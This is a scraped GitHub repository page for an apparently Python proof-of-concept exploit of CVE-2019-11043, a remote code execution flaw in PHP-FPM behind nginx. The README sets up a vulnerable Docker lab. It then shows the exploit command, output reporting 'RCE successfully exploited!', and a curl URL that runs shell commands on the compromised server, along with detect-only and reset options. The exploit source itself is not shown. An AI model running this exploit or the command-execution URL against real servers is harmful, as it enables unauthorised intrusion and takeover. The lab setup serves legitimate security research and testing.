Skip to content
(PoC) Python version of CVE-2019-11043 exploit by neex
Python PHP
Branch: master
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
conf draft Oct 28, 2019
php clean index.php Oct 28, 2019
README.md add args description Oct 29, 2019
docker-compose.yml draft Oct 28, 2019
exploit.py optimized detect/exploit Oct 29, 2019

README.md

PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit https://github.com/neex/phuip-fpizdam
This PoC is still a draft, please use the exploit written by @neex
Vulnerability Analysis: https://paper.seebug.org/1064/

PoC Setup

Just run docker compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

if you wish to read php-fpm logs, you could run:

docker logs --tail 10 --follow php

Exploit

# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

If you want to check the vulnerability only, skipping the exploit:

python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

You can try to kill php-fpm process and reset all injected PHP settings with --reset:

python3 exploit.py --url http://localhost/index.php --reset

Video PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

You can’t perform that action at this time.